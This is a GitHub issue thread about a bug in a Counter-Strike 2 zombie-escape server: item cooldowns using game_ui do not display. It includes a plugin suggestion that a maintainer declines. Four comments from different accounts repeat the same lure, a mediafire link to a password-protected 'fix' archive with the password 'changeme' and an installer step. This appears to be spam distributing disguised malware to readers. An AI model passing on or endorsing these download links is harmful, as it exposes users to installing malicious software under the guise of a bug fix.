### ISSUE TITLE
[Bug]使用game_ui的神器cd无法显示

### ISSUE THREAD

**Issue by sundog259** [UpKK-Xnet-YYDCS/UPKK_ZE_PUBLIC#1537]
## 简介

**（在这里填写您的简介）**

## 重现步骤

- [x] 这个 Bug 可以稳定重现
- [ ] 这个 Bug 有时会出现
- [ ] 这个 Bug 是完全随机的
- [ ] 我不知道如何重现它

**Comment by sundog259** [comment]
服务器是否考虑添加 https://github.com/darkerz7/CS2-EntityFix

**Comment by e54385991** [comment]
稍晚将部署到测试服进行测试后决定

**Comment by e54385991** [comment]
因为此项涉及 DynamicHook  这在windows中可能产生炸服等风险 暂时不进行部署.

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sundog259** [comment]
ok

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
